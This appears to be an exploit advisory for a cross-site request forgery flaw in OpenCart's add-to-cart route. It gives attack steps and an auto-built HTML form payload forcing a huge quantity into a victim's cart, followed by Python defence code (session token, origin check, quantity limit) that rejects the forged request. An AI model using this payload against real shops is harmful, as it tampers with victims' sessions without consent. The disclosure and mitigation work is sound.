# Exploit Title: OpenCart - Cross Site Request Forgery  
# Date: 12-11-2020  
# Exploit Author: Mahendra Purbia {Mah3Sec}  
# Vendor Homepage:  
# Software Link:  
# Version: OpenCart CMS -   
# Tested on: Kali Linux  
This product has functionality that lets a user add another user's wish-list to his/her own cart. User A can add products to his/her wish-list and make that wish-list public so that other users can see it. As user B there is an "add to cart" button; when you click it, that public wish-list is added to your cart.
# Additional Information:
Well, I found this vulnerability on OpenCart-based websites, but they did not respond, so I installed the latest version of OpenCart CMS, hosted it on localhost with the help of XAMPP, and then exploited that vulnerability.
Attack Vector:  
1. Create two accounts: A (attacker) and B (victim).
2. Log in as A, add a product to the cart, and capture that particular request in Burp Suite.
3. Change the quantity if you want, then create a CSRF PoC of that request.
4. Save it as .html and send it to the victim. The product is now added to the victim's cart.
<!-- CSRF PoC - generated by Burp Suite Professional -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- cross-site POST to the cart endpoint; the victim's browser attaches its own session cookie -->
    <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
      <input type="hidden" name="product_id" value="43" />
      <input type="hidden" name="quantity" value="10000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
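A server-side check that would block the PoC above, added here as an illustration and not OpenCart's own code: the shop binds a random per-session token to its own add-to-cart form, and the handler rejects any POST that lacks that token, arrives from a foreign Origin/Referer, or carries an out-of-range quantity. The names `Session`, `cart_add`, `origin_allowed`, `SHOP_ORIGIN` and the quantity cap of 99 are assumptions made for this example; product_id 43 and quantity 10000000 are the values from the PoC.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Assumed shop origin: the PoC above posts to http://localhost/shop/...
SHOP_ORIGIN = "http://localhost"
# Constructed per-line cap; a real shop would derive this from stock/config
MAX_QUANTITY = 99


@dataclass
class Session:
    """Server-side session state; the CSRF token lives here, not in the attacker-readable page."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))
    cart: dict = field(default_factory=dict)


def render_add_form(session: Session, product_id: int) -> str:
    """The form the shop itself serves: it carries the per-session token as a hidden field,
    which a page on another origin cannot read and therefore cannot reproduce."""
    return (
        '<form action="/shop/index.php?route=checkout/cart/add" method="POST">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}" />'
        f'<input type="hidden" name="product_id" value="{product_id}" />'
        '<input type="number" name="quantity" value="1" />'
        '</form>'
    )


def origin_allowed(headers: dict) -> bool:
    """Second layer: accept only requests whose Origin (falling back to Referer) is the
    shop's own origin. Browsers set Origin on cross-site POSTs, so a forged page cannot spoof it."""
    origin = headers.get("Origin")
    if origin is None:
        ref = headers.get("Referer")
        if ref is None:
            return False
        p = urlparse(ref)
        origin = f"{p.scheme}://{p.netloc}"
    return origin == SHOP_ORIGIN


def cart_add(session: Session, headers: dict, form: dict) -> tuple[int, str]:
    """Hardened handler: token check, origin check, then input validation.
    Returns (HTTP status, message)."""
    submitted = form.get("csrf_token", "")
    # Constant-time compare so the token cannot be guessed byte by byte
    if not hmac.compare_digest(submitted, session.csrf_token):
        return 403, "missing or invalid CSRF token"
    if not origin_allowed(headers):
        return 403, "cross-site request rejected"
    try:
        product_id = int(form["product_id"])
        quantity = int(form.get("quantity", 1))
    except (KeyError, ValueError):
        return 400, "bad product_id/quantity"
    if not 1 <= quantity <= MAX_QUANTITY:
        return 400, f"quantity must be between 1 and {MAX_QUANTITY}"
    session.cart[product_id] = session.cart.get(product_id, 0) + quantity
    return 200, "added"


def forged_request(session: Session) -> tuple[int, str]:
    """Constructed replay of the PoC: a page on another origin, no token, huge quantity."""
    headers = {"Origin": "http://attacker.example"}
    form = {"product_id": "43", "quantity": "10000000"}
    return cart_add(session, headers, form)


def legitimate_request(session: Session) -> tuple[int, str]:
    """Same endpoint used from the shop's own form: token present, same origin."""
    headers = {"Origin": SHOP_ORIGIN}
    form = {"csrf_token": session.csrf_token, "product_id": "43", "quantity": "2"}
    return cart_add(session, headers, form)


if __name__ == "__main__":
    s = Session(user="B")
    print(forged_request(s))      # (403, 'missing or invalid CSRF token')
    print(legitimate_request(s))  # (200, 'added')
    print(s.cart)                 # {43: 2}
```

The token check alone defeats the PoC; the Origin/Referer check is defence in depth for the case where a token leaks, and the quantity bound limits the damage of any request that does get through.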